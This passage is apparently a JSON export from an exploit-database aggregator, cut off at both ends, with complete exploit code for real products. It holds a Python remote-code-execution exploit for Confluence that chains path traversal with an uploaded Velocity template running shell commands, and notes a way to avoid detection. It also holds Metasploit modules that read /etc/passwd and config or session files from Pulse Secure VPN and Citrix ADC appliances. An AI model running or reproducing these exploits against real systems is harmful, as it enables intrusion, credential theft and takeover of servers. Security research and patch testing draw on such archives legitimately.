\nhelp=\"target hostname/domain\", \nrequired=True \n) \nparser.add_argument( \n\"-p\", \"--port\", \nhelp=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\" \n) \n \n# two different sub commands \nsubparsers = parser.add_subparsers( \ntitle=\"actions\", \ndescription=\"different behaviours of the script\", \nhelp=\"for detail description of available action options invoke -h for each individual action\", \ndest=\"action\" \n) \n \n# only exploring file system by disclosure of files and directories \nparser_file_system = subparsers.add_parser( \n\"fs\", \nhelp=\"use the exploit to browse local file system on the target endpoint\" \n) \nparser_file_system.add_argument( \n\"path\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_file_system.set_defaults(func=exploit_path_traversal) \n \n# using file upload to deploy payload and achieve RCE \nparser_rce = subparsers.add_parser( \n\"rce\", \nhelp=\"use the exploit to upload a template \" \n) \nparser_rce.add_argument( \n\"-hd\", \"--home-directory\", \nhelp=\"Confluence home directory on the server\" \n) \nparser_rce.add_argument( \n\"-c\", \"--cookie\", \nhelp=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \" \n\"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\", \ntype=check_cookie_format, \nrequired=True \n) \nparser_rce.add_argument( \n\"command\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_rce.set_defaults(func=exploit_rce) \n \n# parsing \narguments = parser.parse_args() \n \nreturn arguments \n \n \nclass Configuration: \n\"\"\" \nRepresents all supported configuration items. \n\"\"\" \n \n# Parse arguments and set all configuration variables \ndef __init__(self, script_args): \nself.script_arguments = script_args \n \n# setting input arguments \nself._proxy = self.script_arguments.proxy \nself._target_protocol = \"https\" if self.script_arguments.tls else \"http\" \nself._target_host = self.script_arguments.target_host \nself._target_port = self.script_arguments.port if self.script_arguments.port else \\ \n443 if self.script_arguments.tls else 80 \n \n@staticmethod \ndef get_logger(verbosity): \n\"\"\" \nPrepares logger to output to stdout with appropriate verbosity. \n\"\"\" \nlogger = logging.getLogger() \n# default logging level \nlogger.setLevel(logging.DEBUG) \n \n# Definition of logging to console \nch = logging.StreamHandler() \n# specific logging level for console \nif verbosity == 0: \nch.setLevel(logging.INFO) \nelif verbosity > 0: \nch.setLevel(logging.DEBUG) \n \n# formatting \nclass MyFormatter(logging.Formatter): \n \ndefault_fmt = logging.Formatter('[?] %(message)s') \ninfo_fmt = logging.Formatter('[+] %(message)s') \nerror_fmt = logging.Formatter('[-] %(message)s') \nwarning_fmt = logging.Formatter('[!] %(message)s') \ndebug_fmt = logging.Formatter('>>> %(message)s') \n \ndef format(self, record): \nif record.levelno == logging.INFO: \nreturn self.info_fmt.format(record) \nelif record.levelno == logging.ERROR: \nreturn self.error_fmt.format(record) \nelif record.levelno == logging.WARNING: \nreturn self.warning_fmt.format(record) \nelif record.levelno == logging.DEBUG: \nreturn self.debug_fmt.format(record) \nelse: \nreturn self.default_fmt.format(record) \n \nch.setFormatter(MyFormatter()) \n \n# adding handler \nlogger.addHandler(ch) \n \nreturn logger \n \n# Properties \n@property \ndef endpoint(self): \nif not self._target_protocol or not self._target_host or not self._target_port: \nexit_log(log, \"failed to generate endpoint URL\") \nreturn f\"{self._target_protocol}://{self._target_host}:{self._target_port}\" \n \n@property \ndef remote_path(self): \nreturn self.script_arguments.path \n \n@property \ndef attachment_dir(self): \nhome_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \\ \nExploit.DEFAULT_CONFLUENCE_INSTALL_DIR \nreturn f\"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}\" \n \n@property \ndef rce_command(self): \nreturn self.script_arguments.command \n \n@property \ndef session_cookie(self): \nif not self.script_arguments.cookie: \nreturn None \nparts = self.script_arguments.cookie.split(\"=\") \nreturn { \nparts[0]: parts[1] \n} \n \n@property \ndef proxies(self): \nreturn { \n\"http\": self._proxy, \n\"https\": self._proxy \n} \n \n \nclass Exploit: \n\"\"\" \nThis class represents actual exploit towards the target Confluence server. \n\"\"\" \n# used for both path traversal and RCE \nDEFAULT_VULNERABLE_ENDPOINT = \"/rest/tinymce/1/macro/preview\" \n \n# used only for RCE \nCREATE_PERSONAL_SPACE_PATH = \"/rest/create-dialog/1.0/space-blueprint/create-personal-space\" \nPERSONAL_SPACE_KEY_PATH = \"/index.action\" \nPERSONAL_SPACE_KEY_REGEX = r\"^/spaces/viewspace\\.action\\?key=(.*?)$\" \nPERSONAL_SPACE_ID_PATH = \"/rest/api/space\" \nPERSONAL_SPACE_KEY_PARAMETER_NAME = \"spaceKey\" \nHOMEPAGE_REGEX = r\"/rest/api/content/([0-9]+)$\" \nATL_TOKEN_PATH = \"/pages/viewpageattachments.action\" \nFILE_UPLOAD_PATH = \"/pages/doattachfile.action\" \n# file name has no real significance, file is identified on file system by it's ID \n# (change only if you want to avoid detection) \nDEFAULT_UPLOADED_FILE_NAME = \"payload_{}.vm\".format( \n''.join(random.choice(string.ascii_lowercase) for i in range(5)) \n) # the extension .vm is not really needed, remove it if you have problems uploading the template \nDEFAULT_CONFLUENCE_INSTALL_DIR = \"/var/atlassian/application-data/confluence\" \nDEFAULT_CONFLUENCE_ATTACHMENT_PATH = \"/attachments/ver003\" \n# using random name for uploaded file so it will always be first version of the file \nDEFAULT_FILE_VERSION = \"1\" \n \ndef __init__(self, config): \n\"\"\" \nRuns the exploit towards target_url. \n\"\"\" \nself._config = config \n \nself._target_url = f\"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}\" \n \nif self._config.script_arguments.action == \"rce\": \nself._root_url = f\"{self._config.endpoint}/\" \nself._create_personal_space_url = f\"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}\" \nself._personal_space_key_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}\" \n \n# Following data will be dynamically created while exploit is running \nself._space_key = None \nself._personal_space_id_url = None \nself._space_id = None \nself._homepage_id = None \nself._atl_token_url = None \nself._atl_token = None \nself._upload_url = None \nself._file_id = None \n \ndef generate_payload_location(self): \n\"\"\" \nGenerates location on file system for uploaded attachment based on Confluence Ver003 scheme. \n \nSee more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html \n\"\"\" \nif not self._space_id or not self._homepage_id or not self._file_id: \nexit_log(log, \"cannot generate payload location without space, homepage and file ID\") \n \nspace_folder_one = str(int(self._space_id[-3:]) % 250) \nspace_folder_two = str(int(self._space_id[-6:-3]) % 250) \nspace_folder_three = self._space_id \npage_folder_one = str(int(self._homepage_id[-3:]) % 250) \npage_folder_two = str(int(self._homepage_id[-6:-3]) % 250) \npage_folder_three = self._homepage_id \nfile_folder = self._file_id \nversion = Exploit.DEFAULT_FILE_VERSION \n \npayload_location = f\"{self._config.attachment_dir}/\" \\ \nf\"{space_folder_one}/{space_folder_two}/{space_folder_three}/\"\\ \nf\"{page_folder_one}/{page_folder_two}/{page_folder_three}/\" \\ \nf\"{file_folder}/{version}\" \nlog.debug(f\"generated payload location: {payload_location}\") \n \nreturn payload_location \n \ndef path_traversal(self, target_remote_path, decode_output=False): \n\"\"\" \nUses vulnerability in _template parameter to achieve path traversal. \n \nArgs: \ntarget_remote_path (string): path on local file system of the target application \ndecode_output (bool): set to True if output of the file will be character codes separated by new lines, \nused with RCE \n\"\"\" \npost_data = { \n\"contentId\": str(random.randint(1, 10000)), \n\"macro\": { \n\"body\": \"\", \n\"name\": \"widget\", \n\"params\": { \n\"_template\": f\"file://{target_remote_path}\", \n\"url\": \"https://www.youtube.com/watch?v=\" + ''.join(random.choice( \nstring.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11)) \n} \n} \n} \n \nlog.info(\"sending request towards vulnerable endpoint with payload in '_template' parameter\") \nresponse = requests.post( \nself._target_url, \nheaders={ \n\"Content-Type\": \"application/json; charset=utf-8\" \n}, \njson=post_data, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"exploit failed\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \n# if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve \n# the requested path \nerror_element = soup.find_all(\"div\", \"widget-error\") \nif error_element: \nlog.warning(\"failed to retrieve target path on the system\") \nlog.warning(\"target path does not exist or application does not have appropriate permissions to view it\") \nreturn \"\" \nelse: \n# otherwise parse out the actual response (file content or directory listing) \noutput_element = soup.find_all(\"div\", \"wiki-content\") \n \nif not output_element: \nexit_log(log, \"application did not return appropriate HTML element\") \nif not len(output_element) == 1: \nlog.warning(\"application unexpectedly returned multiple HTML elements, using the first one\") \noutput_element = output_element[0] \n \nlog.debug(\"extracting HTML element value and stripping the leading and trailing spaces\") \n# output = output_element.string.strip() \noutput = output_element.decode_contents().strip() \n \nif \"The macro 'widget' is unknown. It may have been removed from the system.\" in output: \nexit_log(log, \"widget seems to be disabled on system, target most likely is not vulnerable\") \n \nif not self._config.script_arguments.silent: \nif decode_output: \nparsed_output = \"\" \np = re.compile(r\"^([0-9]+)\") \nfor line in output.split(\"\\n\"): \nr = p.match(line) \nif r: \nparsed_output += chr(int(r.group(1))) \nprint(parsed_output.strip()) \nelse: \nprint(output) \n \nreturn output \n \ndef find_personal_space_key(self): \n\"\"\" \nMakes request that will return personal space key in the response. \n\"\"\" \nlog.debug(\"checking if user has personal space\") \nresponse = requests.get( \nself._root_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \n) \npage_content = response.text \nif \"Add personal space\" in page_content: \nlog.info(f\"user does not have personal space, creating it now...\") \n \nresponse = requests.post( \nself._create_personal_space_url, \nheaders={ \n\"Content-Type\": \"application/json\" \n}, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \njson={ \n\"spaceUserKey\": \"\" \n} \n) \n \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to create personal space\") \n \nlog.debug(f\"personal space created\") \nresponse_data = response.json() \nself._space_key = response_data.get(\"key\") \nelse: \nlog.info(\"sending request to find personal space key\") \nresponse = requests.get( \nself._personal_space_key_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \npersonal_space_link_element = soup.find(\"a\", id=\"view-personal-space-link\") \nif not personal_space_link_element or not personal_space_link_element.has_attr(\"href\"): \nexit_log(log, \"failed to find personal space link in the response, does the user have personal space?\") \npath = personal_space_link_element[\"href\"] \np = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX) \nr = p.match(path) \nif r: \nself._space_key = r.group(1) \nelse: \nexit_log(log, \"failed to find personal space key\") \n \nlog.debug(f\"personal space key: {self._space_key}\") \nself._personal_space_id_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?\" \\ \nf\"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}\" \nlog.debug(f\"generated personal space id url: {self._personal_space_id_url}\") \n \ndef find_personal_space_id_and_homepage_id(self): \n\"\"\" \nMakes request that will return personal space ID and homepage ID in the response. \n\"\"\" \nif self._personal_space_id_url is None: \nexit_log(log, f\"personal space id url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find personal space ID and homepage\") \nresponse = requests.get( \nself._personal_space_id_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is JSON \ndata = json.loads(page_content) \n \nif \"results\" not in data: \nexit_log(log, \"failed to find 'result' section in json output\") \nitems = data[\"results\"] \nif type(items) is not list or len(items) == 0: \nexit_log(log, \"no results for personal space id\") \npersonal_space_data = items[0] \nif \"id\" not in personal_space_data: \nexit_log(log, \"failed to find ID in personal space data\") \nself._space_id = str(personal_space_data[\"id\"]) \nlog.debug(f\"found space id: {self._space_id}\") \nif \"_expandable\" not in personal_space_data: \nexit_log(log, \"failed to find '_expandable' section in personal space data\") \npersonal_space_expandable_data = personal_space_data[\"_expandable\"] \nif \"homepage\" not in personal_space_expandable_data: \nexit_log(log, \"failed to find homepage in personal space expandable data\") \nhomepage_path = personal_space_expandable_data[\"homepage\"] \np = re.compile(Exploit.HOMEPAGE_REGEX) \nr = p.match(homepage_path) \nif r: \nself._homepage_id = r.group(1) \nlog.debug(f\"found homepage id: {self._homepage_id}\") \nself._atl_token_url = f\"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated atl token url: {self._atl_token_url}\") \nself._upload_url = f\"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated upload url: {self._upload_url}\") \nelse: \nexit_log(log, \"failed to find homepage id, homepage path has incorrect format\") \n \ndef get_csrf_token(self): \n\"\"\" \nMakes request to get the current CSRF token for the session. \n\"\"\" \nif self._atl_token_url is None: \nexit_log(log, f\"atl token url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find CSRF token\") \nresponse = requests.get( \nself._atl_token_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \natl_token_element = soup.find(\"input\", {\"name\": \"atl_token\"}) \nif not atl_token_element.has_attr(\"value\"): \nexit_log(log, \"failed to find value for atl_token\") \nself._atl_token = atl_token_element[\"value\"] \nlog.debug(f\"found CSRF token: {self._atl_token}\") \n \ndef upload_template(self): \n\"\"\" \nMakes multipart request to upload the template file to the server. \n\"\"\" \nlog.info(\"uploading template to server\") \nif not self._atl_token: \nexit_log(log, \"cannot upload a file without CSRF token\") \nif self._upload_url is None: \nexit_log(log, f\"upload url is missing, did you call exploit functions in correct order?\") \n \n# Velocity template here executes command and then captures the output. Here the output is generated by printing \n# character codes one by one in each line. This can be improved for sure but did not have time to investigate \n# why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern \n# webapp' was not working properly. This gets decoded on our python client later. \ntemplate = f\"\"\"#set( $test = \"test\" ) \n#set($ex = $test.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"{self._config.script_arguments.command}\")) \n#set($exout = $ex.waitFor()) \n#set($out = $ex.getInputStream()) \n#foreach($i in [1..$out.available()]) \n#set($ch = $out.read()) \n$ch \n#end\"\"\" \n \nlog.debug(f\"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}\") \nparts = { \n\"atl_token\": (None, self._atl_token), \n\"file_0\": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template), \n\"confirm\": \"Attach\" \n} \nresponse = requests.post( \nself._upload_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nfiles=parts \n) \n \n# for successful upload first a 302 response needs to happen then 200 page is returned with file ID \nif response.status_code == 403: \nexit_log(log, \"got 403, probably problem with CSRF token\") \nif not len(response.history) == 1 or not response.history[0].status_code == 302: \nexit_log(log, \"failed to upload the payload\") \n \npage_content = response.content \n \nif \"Upload Failed\" in str(page_content): \nexit_log(log, \"failed to upload template\") \n \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \nfile_link_element = soup.find(\"a\", \"filename\", {\"title\": Exploit.DEFAULT_UPLOADED_FILE_NAME}) \nif not file_link_element.has_attr(\"data-linked-resource-id\"): \nexit_log(log, \"failed to find data-linked-resource-id attribute (file ID) for uploaded file link\") \nself._file_id = file_link_element[\"data-linked-resource-id\"] \nlog.debug(f\"found file ID: {self._file_id}\") \n \n \ndef exploit_path_traversal(config): \n\"\"\" \nThis sends one request towards vulnerable server to either get local file content or directory listing. \n\"\"\" \nlog.debug(\"running path traversal exploit\") \n \nexploit = Exploit(config) \nexploit.path_traversal(config.remote_path) \n \n \ndef exploit_rce(config): \n\"\"\"This executes multiple steps to gain RCE. Requires a session token. \n \nSteps: \n1. find personal space key for the user \n2. find personal space ID and homepage ID for the user \n3. get CSRF token (generated per session) \n4. upload template file with Java code (involves two requests, first one is 302 redirection) \n5. use path traversal part of exploit to load and execute local template file \n6. profit \n\"\"\" \nlog.debug(\"running RCE exploit\") \n \nexploit = Exploit(config) \nexploit.find_personal_space_key() \nexploit.find_personal_space_id_and_homepage_id() \nexploit.get_csrf_token() \nexploit.upload_template() \npayload_location = exploit.generate_payload_location() \nexploit.path_traversal(payload_location, decode_output=True) \n \n \nif __name__ == \"__main__\": \n# parse arguments and load all configuration items \nscript_arguments = parse_arguments() \nlog = Configuration.get_logger(script_arguments.verbosity) \n \nconfiguration = Configuration(script_arguments) \n \n# printing banner \nif not configuration.script_arguments.skip_banner: \nprint_banner() \n \nif script_arguments.quiet: \nlog.disabled = True \n \nlog.debug(\"finished parsing CLI arguments\") \nlog.debug(\"configuration was loaded successfully\") \nlog.debug(\"starting exploit\") \n \n# disabling warning about trusting self sign certificate from python requests \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \n# run appropriate function depending on mode \nconfiguration.script_arguments.func(configuration) \n \nlog.debug(\"done!\") \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161065/atlassiancwcm-inject.txt"}, {"lastseen": "2019-08-22T05:38:44", "description": "", "cvss3": {}, "published": "2019-08-21T00:00:00", "type": "packetstorm", "title": "Pulse Secure SSL VPN 8.1R15.1 / 8.2 / 8.3 / 9.0 Arbitrary File Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "PACKETSTORM:154176", "href": "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html", "sourceData": "`# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) \n# Google Dork: inurl:/dana-na/ filetype:cgi \n# Date: 8/20/2019 \n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera \n# Vendor Homepage: https://pulsesecure.net \n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n# Tested on: Linux \n# CVE : CVE-2019-11510 \nrequire 'msf/core' \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Post::File \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Pulse Secure - System file leak', \n'Description' => %q{ \nPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. \nThis exploit reads /etc/passwd as a proof of concept \nThis vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n}, \n'References' => \n[ \n[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] \n], \n'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'RPORT' => 443, \n'SSL' => true \n}, \n)) \n \nend \n \n \ndef run() \nprint_good(\"Checking target...\") \nres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) \n \nif res && res.code == 200 \nprint_good(\"Target is Vulnerable!\") \ndata = res.body \ncurrent_host = datastore['RHOST'] \nfilename = \"msf_sslwebsession_\"+current_host+\".bin\" \nFile.delete(filename) if File.exist?(filename) \nfile_local_write(filename, data) \nprint_good(\"Parsing file.......\") \nparse() \nelse \nif(res && res.code == 404) \nprint_error(\"Target not Vulnerable\") \nelse \nprint_error(\"Ooof, try again...\") \nend \nend \nend \ndef parse() \ncurrent_host = datastore['RHOST'] \n \nfileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\") \nwords = 0 \nwhile (line = fileObj.gets) \nprintable_data = line.gsub(/[^[:print:]]/, '.') \narray_data = printable_data.scan(/.{1,60}/m) \nfor ar in array_data \nif ar != \"............................................................\" \nprint_good(ar) \nend \nend \n#print_good(printable_data) \n \nend \nfileObj.close \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154176/pulsesecure-disclose.rb.txt"}], "exploitdb": [{"lastseen": "2023-12-03T18:52:28", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-11-13T00:00:00", "type": "exploitdb", "title": "Citrix ADC NetScaler - Local File Inclusion (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-11-13T00:00:00", "id": "EDB-ID:49038", "href": "https://www.exploit-db.com/exploits/49038", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Auxiliary::Scanner\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)',\r\n 'Description' => %{\r\n The remote device is affected by multiple vulnerabilities.\r\n\r\n An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices.\r\n An unauthenticated remote attacker with access to the `NSIP/management interface` can exploit\r\n this to bypass authorization (CVE-2020-8193).\r\n\r\n And Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which.\r\n },\r\n 'Author' => [\r\n 'Donny Maasland', # Discovery\r\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-8193'],\r\n ['CVE', '2020-8195'],\r\n ['CVE', '2020-8196'],\r\n ['URL', 'https://dmaasland.github.io/posts/citrix.html'],\r\n ['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'],\r\n ['URL', 'https://github.com/jas502n/CVE-2020-8193']\r\n ],\r\n 'DisclosureDate' => '2020-07-09',\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n }\r\n ))\r\n\r\n register_options([\r\n OptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]),\r\n OptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']),\r\n OptString.new('TARGETURI', [true, 'Base path', '/'])\r\n ])\r\n end\r\n\r\n def create_session\r\n params = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1'\r\n\r\n request = {\r\n 'method' => 'POST',\r\n 'uri' => \"#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}\",\r\n 'ctype' => 'application/xml',\r\n 'headers' => {\r\n 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),\r\n 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8)\r\n },\r\n 'data' => '<appfwprofile><login></login></appfwprofile>'\r\n }\r\n request = request.merge({'cookie' => @cookie}) if @cookie\r\n\r\n response = send_request_raw(request)\r\n unless response && response.code == 406\r\n print_error(\"#{@message_prefix} - No response to session request.\")\r\n return\r\n end\r\n\r\n response.get_cookies\r\n end\r\n\r\n def fix_session_rand\r\n response = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'menu', 'ss'),\r\n 'cookie' => @cookie,\r\n 'vars_get' => {\r\n 'sid' => 'nsroot',\r\n 'username' => 'nsroot',\r\n 'force_setup' => '1'\r\n }\r\n )\r\n\r\n if response && response.code == 302\r\n location = response.headers['location']\r\n\r\n response = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => location,\r\n 'cookie' => @cookie\r\n )\r\n\r\n return unless response && response.code == 200\r\n end\r\n\r\n response.to_s.scan(/rand = \"([^\"]+)\"/).join\r\n end\r\n\r\n def read_lfi(path, var_rand)\r\n params = \"filter=path:#{path}\"\r\n\r\n request = {\r\n 'method' => 'POST',\r\n 'uri' => \"#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}\",\r\n 'cookie' => @cookie,\r\n 'ctype' => 'application/xml',\r\n 'headers' => {\r\n 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),\r\n 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8),\r\n 'rand_key' => var_rand\r\n },\r\n 'data' => '<clipermission></clipermission>'\r\n }\r\n\r\n response = send_request_raw(request)\r\n end\r\n\r\n def run_host(ip)\r\n proto = (datastore['SSL'] ? 'https' : 'http')\r\n @message_prefix = \"#{proto}://#{ip}:#{datastore['RPORT']}\"\r\n\r\n @cookie = create_session\r\n if @cookie && @cookie =~ /SESSID/\r\n print_status(\"#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}\")\r\n\r\n var_rand = fix_session_rand\r\n unless var_rand\r\n print_error(\"#{@message_prefix} - Unable to get rand value.\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n print_status(\"#{@message_prefix} - Got rand: #{var_rand}\")\r\n\r\n print_status(\"#{@message_prefix} - Re-breaking session...\")\r\n create_session\r\n\r\n case datastore['MODE']\r\n when /discovery/\r\n response = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand)\r\n if response.code == 406\r\n if response.body.include? ('root:*:0:0:')\r\n print_warning(\"#{@message_prefix} - Vulnerable.\")\r\n\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n end\r\n when /interactive/\r\n # TODO: parse response\r\n response = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand)\r\n if response.code == 406\r\n print_line(\"#{response.body}\")\r\n end\r\n\r\n return\r\n when /sessions/\r\n # TODO: parse response\r\n response = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand)\r\n if response.code == 406\r\n print_line(\"#{response.body}\")\r\n end\r\n\r\n return\r\n end\r\n end\r\n print_good(\"#{@message_prefix} - Not Vulnerable.\")\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/raw/49038", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2023-12-03T17:22:33", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-11-14T00:00:00", "type": "zdt", "title": "Citrix ADC NetScaler Local File Inclusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-11-14T00:00:00", "id": "1337DAY-ID-35228", "href": "https://0day.today/exploit/description/35228", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)',\n 'Description' => 